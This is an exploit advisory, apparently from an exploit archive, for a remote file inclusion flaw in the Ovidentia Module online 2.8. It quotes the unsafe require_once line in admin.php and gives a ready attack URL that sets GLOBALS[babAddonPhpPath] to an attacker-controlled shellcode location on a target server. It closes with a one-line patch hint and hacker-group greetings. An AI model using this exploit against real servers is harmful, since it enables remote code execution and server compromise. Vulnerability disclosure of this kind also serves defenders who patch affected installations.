25 lines
1.1 KiB
Text
Executable file
25 lines
1.1 KiB
Text
Executable file
# Title: Ovidentia Module online 2.8 GLOBALS[babAddonPhpPath] Remote File Include Vulnerability
|
|
# Author: bd0rk
|
|
# eMail: bd0rk[at]hackermail.com
|
|
# Twitter: twitter.com/bd0rk
|
|
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fonline&file=online-2-8.zip&idf=832
|
|
|
|
PoC:
|
|
/online-2-8/programs/admin.php line 2
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
require_once( $GLOBALS['babAddonPhpPath']."functions.php");
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
[+]Exploit: http://[target]/online-2-8/programs/admin.php?GLOBALS[babAddonPhpPath]=EVIL_SHELLCODE?
|
|
|
|
Description: The $GLOBALS['babAddonPhpPath']-parameter isn't declared before qequire_once.
|
|
So it's possible to compromise the web-server about it.
|
|
An attacker can inject s0me php-shellcode.
|
|
I think, it's a big problem in this web-software!
|
|
|
|
Patch: You can declare the vulnerable parameter or use an alert.
|
|
|
|
|
|
~~Greetz: x0r_32, m0rphin, GoLd_M, zone-h.org-Team~~
|
|
|
|
|